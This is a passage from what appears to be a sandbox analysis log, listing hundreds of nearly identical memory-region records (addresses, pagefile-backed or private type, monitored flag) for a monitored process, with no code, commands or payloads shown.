pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16178 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16179 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16180 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16181 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16182 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16183 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16184 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16185 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16186 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16187 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16188 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16189 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16190 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16191 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16192 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16193 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16194 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16195 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16196 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 16197 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16198 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16199 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16200 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16201 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16202 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16203 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16204 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16205 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16206 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16207 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 16208 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16209 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16210 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16211 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 16212 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16213 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16214 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16215 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16216 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16217 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16218 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16219 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16220 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16221 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16222 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16223 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16224 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16225 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16226 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16227 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16228 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16229 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16230 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16231 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 16232 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16233 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16234 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16235 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16236 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16237 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16238 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16239 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16240 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16241 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16242 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16243 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16244 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16245 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16246 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16247 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16248 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16249 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16250 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16251 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16252 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16253 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16254 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16255 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16256 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16257 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16258 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16259 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16260 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16261 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16262 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16263 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16264 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16265 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16266 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16267 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16268 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16269 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16270 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16271 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16272 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16273 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16274 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16275 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16276 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16277 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16278 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16279 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16280 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16281 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16282 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16283 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16284 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16285 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16286 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16287 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16288 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16289 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16290 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16291 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16292 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16293 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16294 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16295 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16296 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16297 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16298 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16299 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16300 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16301 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16302 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16303 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16304 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16305 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16306 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16307 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16308 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 16309 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16310 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16311 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16312 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16313 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16314 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16315 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16316 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16317 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16318 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16319 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16320 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16321 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16322 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16323 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16324 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16325 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16326 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 16327 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16328 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16329 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16330 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16331 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 16332 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16333 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16334 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16335 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16336 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16337 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16338 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16339 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16340 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16341 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16342 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16343 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16344 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16345 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16346 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16347 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16348 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16349 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16350 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16351 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16352 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16353 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16354 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16355 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16356 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16357 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16358 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16359 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 16360 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16361 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16362 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16363 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16364 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16365 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16366 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = 